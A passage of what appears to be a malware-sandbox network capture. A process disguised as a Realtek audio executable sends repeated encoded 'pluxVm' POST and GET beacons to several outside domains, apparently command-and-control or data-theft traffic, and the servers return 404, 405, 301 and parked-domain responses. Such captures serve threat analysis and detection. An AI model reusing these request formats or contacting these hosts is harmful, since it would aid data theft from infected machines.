                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:52:12 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Content-Length: 389
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.11.20 | 49769 | 209.74.79.42 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:52:15.144032955 CET | 700 | OUT | POST /dheh/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.glowups.life
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.glowups.life
                                                                                                                                                                                                                                Referer: http://www.glowups.life/dheh/
                                                                                                                                                                                                                                Content-Length: 223
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Ascii: pluxVm=3L0sD6h+2VkiP/HPE9qCGdNPbgy6ID2HhfGj0Cs4ffotbPDFvIu1+mefBBOqjqgCnWduZFuvH24v4f/duDy1SFzdZdssbCWVvNcdqsVLMe/r8PvoOKfZRSxc1jRdm/IlkXi5GZEyQxVOZ+eU4xE9YijntLSNqZiFsSsV3Kx2CkA8fTGoBNO0cVC1cU0a4phbRnWWqB7eDno1PMYK0i1mxE8=
Dec 3, 2024 14:52:15.316479921 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:52:15 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Content-Length: 389
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.11.20 | 49770 | 209.74.79.42 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:52:17.846971035 CET | 6445 | OUT | POST /dheh/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.glowups.life
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.glowups.life
                                                                                                                                                                                                                                Referer: http://www.glowups.life/dheh/
                                                                                                                                                                                                                                Content-Length: 7371
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Ascii: pluxVm=3L0sD6h+2VkiP/HPE9qCGdNPbgy6ID2HhfGj0Cs4feQtY8bFuvS1xGefIhOrjqhQnWF1ZFS/H1Qv5/jdvyy1bFzdR9stViXdvJABqsFLMe/r8M3oYPrZCixfkjRR3vIekTGpGZIiRB1OAfuU0n49QijlqLSFqZ/fsW0v3LVcCnQ8dkWwFOeSPGW/cnIT3qJ+RH2xuTztMDgRM+U3zHZyikLERyVCd7s8fPhdrEpZaJzr/FMWzqYz5XEioU4aEXKw+FlXOzc9DFjvpEmWlmXGmIx6gyYZVS1IwgCSymXRlV5D6QK1uKyWQt5o2PF548cY2N2tulD43Wk7WbvDlu4s76H9DPbsS6aM9Kd8/E3bMDenk+G5RLfadcgUyVh1Gr+FnAvvfC0VYWm5QoePCRWt5T7fw+GXQU4l+SX9Fr0TvBmk0dBpS6TGkdSfT5HLOFpT1sDMj/kc6qpL69Wwp/yu7GnieYUk4Z+O9bSlVcaOByrZDH2JUBh6JaBb31y2G+d7nz1zdC4AiHzmlpBSk9E4CXupdHN25DA45w22S/KmqSxtEHzQxKJ5T3j3jnW0rrrfWrm0LaHSPXz2j38qVHiyI8IDPI/7EJruirK7nM7kHlV/6kdXIMuUbVeDlMr5eRci5fZc60Qa+lNZjn6lTnHCYu0nxDqie3EF977hd/P/LzcHEFa9rPw6kn7ehjxJct/nNSJyBR9HAYbNFSP7rxsvX4p7vcHCGGQi2hDaTYnOnJpgzJrd1VOzOSiVqC6W7lNqS9n83woOSuu1MVD+28CalthIBpxyG5zFz7RNu7Wxdu54TIS3Repc0UjWJCENUd/IaY3z7iAcZeDzpZXL9jaUMCM/g6CZOCVVa8t1piI76dCf3iRazyrebJzcRVtwTB1gD0VFCcWvGuObJmmuVg26NePnE82Mz/MulWww/S5JTRgxT50D27uy3RQmAwNxYGkg+aGQKPlKHIRJuzq8s8JhtIlb2ZKeL3jq90Ahz5aXruhHQ [TRUNCATED]
Dec 3, 2024 14:52:17.847080946 CET | 1404 | OUT
                                                                                                                                                                                                                                Data Ascii: B9SwrIbm+JXRWSc6PRoYxeYp8AeVkQQ1kMFUuef9tk99kxHPnKxuhIDZMcoq3de7AWinTyFEaPTMCtJ19yi35Qkk+5jJUOlu4mJAKVzKJ3Ds7MNJ5T0KMMekW9rBSHDzaM39jt3MWghk769Z5xJVA3y0GoZskHi9jQpVdggPGOi0QtCXmMP+NCRrrDn9o9x6LqdTANWTtVe1vYxr9j1M/Du0fDAzOdY0yaSwPnBLI+mtdhukOCP
Dec 3, 2024 14:52:18.035595894 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:52:17 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Content-Length: 389
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.11.20 | 49771 | 209.74.79.42 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:52:20.550163984 CET | 419 | OUT | GET /dheh/?pluxVm=6JcMAOZ0kkEuPLPobYSFFslgEkquVWiK5Nqk+SkmZf4Wc9f19ayTyDiVFSf9h78jkWY5XnirO34u2f/fghaoX1igb+ZsamnQxKAe0eVMQ+zxkvaWI9vtOSA=&Z1EO=OvfHeluUy HTTP/1.1
                                                                                                                                                                                                                                Host: www.glowups.life
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Dec 3, 2024 14:52:20.724860907 CET548INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:52:20 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Content-Length: 389
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.11.20 | 49772 | 208.91.197.27 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:52:26.119172096 CET | 698 | OUT | POST /mdkc/ HTTP/1.1
Host: www.epicurecooks.world
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Origin: http://www.epicurecooks.world
Referer: http://www.epicurecooks.world/mdkc/
Content-Length: 203
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.11.20 | 49773 | 208.91.197.27 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:52:28.782742023 CET | 718 | OUT | POST /mdkc/ HTTP/1.1
Host: www.epicurecooks.world
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Origin: http://www.epicurecooks.world
Referer: http://www.epicurecooks.world/mdkc/
Content-Length: 223
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.11.20 | 49774 | 208.91.197.27 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:52:31.454380035 CET | 2440 | OUT | POST /mdkc/ HTTP/1.1
Host: www.epicurecooks.world
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Origin: http://www.epicurecooks.world
Referer: http://www.epicurecooks.world/mdkc/
Content-Length: 7371
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.11.20 | 49775 | 208.91.197.27 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:52:34.124768972 CET | 425 | OUT | GET /mdkc/?pluxVm=yWWHbhCahbG3DdaBnt9NrGvMUCSQc4g2Tqe6SUjOSsODgr6CFa5SJdyjtzT5mznodS2lvT8/GpN3gvUqymh3/8TyFQ0rIiTFrx443/jhZTAx0fULTMMcMck=&Z1EO=OvfHeluUy HTTP/1.1
Host: www.epicurecooks.world
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
Dec 3, 2024 14:52:34.872580051 CET | 997 | IN | HTTP/1.1 200 OK
Date: Tue, 03 Dec 2024 13:52:34 GMT
Server: Apache
Referrer-Policy: no-referrer-when-downgrade
Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
Set-Cookie: vsid=911vr4807795543428155; expires=Sun, 02-Dec-2029 13:52:34 GMT; Max-Age=157680000; path=/; domain=www.epicurecooks.world; HttpOnly
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_Qc4AuhigFg8r2P44Ahsh8bwNmEM1XOJ/2JxY7rqUyl9lnNqfVsEL9tG1PBe14SfEyJewSt5/6EqiUIq8XQ0z/A==
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Connection: close
                                                                                                                                                                                                                                Data Ascii: lse{if(a[0]==="getUSPData"){a[2]({version:1,uspString:window.cmp_rc("")},true)}else{if(a[0]==="getTCData"){__cmp.a.push([].slice.apply(a))}else{if(a[0]==="addEventListener"||a[0]==="removeEventListener"){__cmp.a.push([].slice.apply(a))}else{if
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.016438961 CET1220INData Raw: 67 65 74 47 50 50 44 61 74 61 22 29 7b 72 65 74 75 72 6e 7b 73 65 63 74 69 6f 6e 49 64 3a 33 2c 67 70 70 56 65 72 73 69 6f 6e 3a 31 2c 73 65 63 74 69 6f 6e 4c 69 73 74 3a 5b 5d 2c 61 70 70 6c 69 63 61 62 6c 65 53 65 63 74 69 6f 6e 73 3a 5b 30 5d
                                                                                                                                                                                                                                Data Ascii: getGPPData"){return{sectionId:3,gppVersion:1,sectionList:[],applicableSections:[0],gppString:"",pingData:window.cmp_gpp_ping()}}else{if(g==="hasSection"||g==="getSection"||g==="getField"){return null}else{__gpp.q.push([].slice.apply(a))}}}}}};
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.016459942 CET1220INData Raw: 3a 7b 72 65 74 75 72 6e 56 61 6c 75 65 3a 68 2c 73 75 63 63 65 73 73 3a 67 2c 63 61 6c 6c 49 64 3a 62 2e 63 61 6c 6c 49 64 7d 7d 3b 64 2e 73 6f 75 72 63 65 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 61 3f 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28
                                                                                                                                                                                                                                Data Ascii: :{returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")},"parameter" in b?b.parameter:null,"version" in b?b.version:1)}};window.cmp_setStub=function(a){if(!(a in window)||(typeof(window[a])!=="function"&&typ
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.016685009 CET1220INData Raw: 62 6c 65 75 73 70 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 21 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 69 73 61 62 6c 65 75 73 70 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 65 74 53 74 75 62 28 22 5f 5f 75 73 70 61 70 69 22 29 7d 69 66 28 21 28 22 63
                                                                                                                                                                                                                                Data Ascii: bleusp" in window)||!window.cmp_disableusp){window.cmp_setStub("__uspapi")}if(!("cmp_disablegpp" in window)||!window.cmp_disablegpp){window.cmp_setGppStub("__gpp")};</script><script type="text/javascript">var abp;</script><script type="text/ja


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.11.20 | 49776 | 89.31.143.90 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:52:40.760699987 CET | 677 | OUT | POST /og0p/ HTTP/1.1
Host: www.eichner.pro
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Origin: http://www.eichner.pro
Referer: http://www.eichner.pro/og0p/
Content-Length: 203
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
Dec 3, 2024 14:52:40.954447031 CET | 333 | IN | HTTP/1.1 405 Not Allowed
Date: Tue, 03 Dec 2024 13:52:40 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Server: UD Webspace 3.2
Allow: GET, POST, HEAD
Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.11.20 | 49777 | 89.31.143.90 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:52:43.482830048 CET | 697 | OUT | POST /og0p/ HTTP/1.1
Host: www.eichner.pro
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Origin: http://www.eichner.pro
Referer: http://www.eichner.pro/og0p/
Content-Length: 223
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
Dec 3, 2024 14:52:43.683319092 CET | 333 | IN | HTTP/1.1 405 Not Allowed
Date: Tue, 03 Dec 2024 13:52:43 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Server: UD Webspace 3.2
Allow: GET, POST, HEAD
Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.11.20 | 49778 | 89.31.143.90 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:52:46.209362030 CET | 2578 | OUT | POST /og0p/ HTTP/1.1
Host: www.eichner.pro
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Origin: http://www.eichner.pro
Referer: http://www.eichner.pro/og0p/
Content-Length: 7371
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
Dec 3, 2024 14:52:46.402591944 CET | 333 | IN | HTTP/1.1 405 Not Allowed
Date: Tue, 03 Dec 2024 13:52:46 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Server: UD Webspace 3.2
Allow: GET, POST, HEAD
Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
20          192.168.11.20  49779        89.31.143.90    80                7488  C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp                           Bytes transferred  Direction  Data
Dec 3, 2024 14:52:48.926189899 CET  418                OUT        GET /og0p/?pluxVm=aYNz5vX3IaeBLII2gGf9eURLdfN+pzrBFxzqHFB0Zc0E767K5MaAH/EqLovM7A815HxojS38W68HbT3JNl21N4jIU1lh5jKS99Zmbqcxop+R6eeWU//8U3E=&Z1EO=OvfHeluUy HTTP/1.1
                                                                                                                                                                                                                                Host: www.eichner.pro
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
Dec 3, 2024 14:52:49.118822098 CET  159                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:52:49 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Server: UD Webspace 3.2
                                                                                                                                                                                                                                Data Raw: 31 39 65 30 0d 0a
                                                                                                                                                                                                                                Data Ascii: 19e0
Dec 3, 2024 14:52:49.119079113 CET  1289               IN
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="de"><head><meta name="description"content="Domain registriert bei united-domains.de"><meta http-equiv="Content-Type"content="text/html; charset=UTF-8"><title>Domain im Kundenauftrag registriert</title><style>body,htm
Dec 3, 2024 14:52:49.119390965 CET  1289               IN
                                                                                                                                                                                                                                Data Ascii: HMBw6UZiEGw05eG3rVGa3QBWHBPnaxiIR27L/hBEiB3fYPlqLgBNl9yO3wlkpDUhkpc1alJ/ozFWrPUTtj+qDwiSxw0HaaQR6VA7hKghMPMSqf/AOVXTmgqvu9mAAAAAElFTkSuQmCC');overflow:hidden;text-indent:-9999px;font-size:0;color:rgba(255,255,255,0);text-align:left}#logo img{b
Dec 3, 2024 14:52:49.119434118 CET  1289               IN
                                                                                                                                                                                                                                Data Ascii: bei jeder neuen Domain hinterlegt und zeigt, dass die neue Domain erreichbar ist.<br>Ohne diese Platzhalter-Seite w&uuml;rden Besucher eine Fehlermeldung erhalten. Als Kunde von united-domains k&ouml;nnen Sie diese Domain in Ihrem <a href="ht
Dec 3, 2024 14:52:49.119467974 CET  186                IN
                                                                                                                                                                                                                                Data Ascii: enschutzhinweise</a></p></div></div><div class="footer-wrapper"><div class="footer">&copy; united-domains AG. <span>&nbsp;Alle Rechte vorbehalten.</span></div></div></body></html>0


Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
21          192.168.11.20  49780        8.136.96.106    80                7488  C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp                           Bytes transferred  Direction  Data
Dec 3, 2024 14:52:55.832865953 CET  689                OUT        POST /mia8/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.juewucangku.xyz
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.juewucangku.xyz
                                                                                                                                                                                                                                Referer: http://www.juewucangku.xyz/mia8/
                                                                                                                                                                                                                                Content-Length: 203
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Ascii: pluxVm=oLCQtEinuHrZUOT+l+AwI7GuF77nKmyibv4Uv9+HQZ9oUj/0+F+8o4qzdIEt36rh42pYe3+rrypy88c5I2xN4r+dx9EIcUrWx3haV+bFOjueYVTSsF0S6MbcYNvk8GgI/M7pUGdcybbVW7M3iZ1YXPrj2PwWXZikwQgQwh828Xa8BO+iIo54cRX+AZ70/qkDYg==
Dec 3, 2024 14:52:56.160330057 CET  403                IN         HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:52:55 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Location: https://www.juewucangku.xyz/mia8/
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
22          192.168.11.20  49781        8.136.96.106    80                7488  C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp                           Bytes transferred  Direction  Data
Dec 3, 2024 14:52:58.682605028 CET  709                OUT        POST /mia8/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.juewucangku.xyz
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.juewucangku.xyz
                                                                                                                                                                                                                                Referer: http://www.juewucangku.xyz/mia8/
                                                                                                                                                                                                                                Content-Length: 223
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Ascii: pluxVm=oLCQtEinuHrZWuD+idYwObGtA77nfWymbv0Uv8LcQqZoXDP0/Bq8lYqzWoEkz6rq42l6eyGrry9y8+05IGNKib+f5dEKR0rWx3haV+muOj2eYkjStk0d3sbfbNvktWgM/M6+UDh2ydHVW783iI1XCfqqpfxdQZXT5AYs8hdq1kiJN4z4VaNcfCLMEpCc9olYFlzxkyIL6lAviCkyCpQ510k=
Dec 3, 2024 14:52:59.006656885 CET  403                IN         HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:52:58 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Location: https://www.juewucangku.xyz/mia8/
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
23          192.168.11.20  49782        8.136.96.106    80                7488  C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp                           Bytes transferred  Direction  Data
Dec 3, 2024 14:53:01.557466030 CET  6445               OUT        POST /mia8/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.juewucangku.xyz
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.juewucangku.xyz
                                                                                                                                                                                                                                Referer: http://www.juewucangku.xyz/mia8/
                                                                                                                                                                                                                                Content-Length: 7371
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
Dec 3, 2024 14:53:01.898566008 CET | 403 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:53:01 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Location: https://www.juewucangku.xyz/mia8/
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.11.20 | 49783 | 8.136.96.106 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:53:04.467344999 CET | 422 | OUT | GET /mia8/?pluxVm=lJqwuwutw0TxfZ38sJgHJ7uqXbvMJU6pA/kgjN31XYZ5TRzvlECqmYueWqhH+dns4k5MWxqP8Bok6NcIC1536fve9u1GdSOEvFZBDrTYEySAKG7uhWgC+P8=&Z1EO=OvfHeluUy HTTP/1.1
                                                                                                                                                                                                                                Host: www.juewucangku.xyz
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
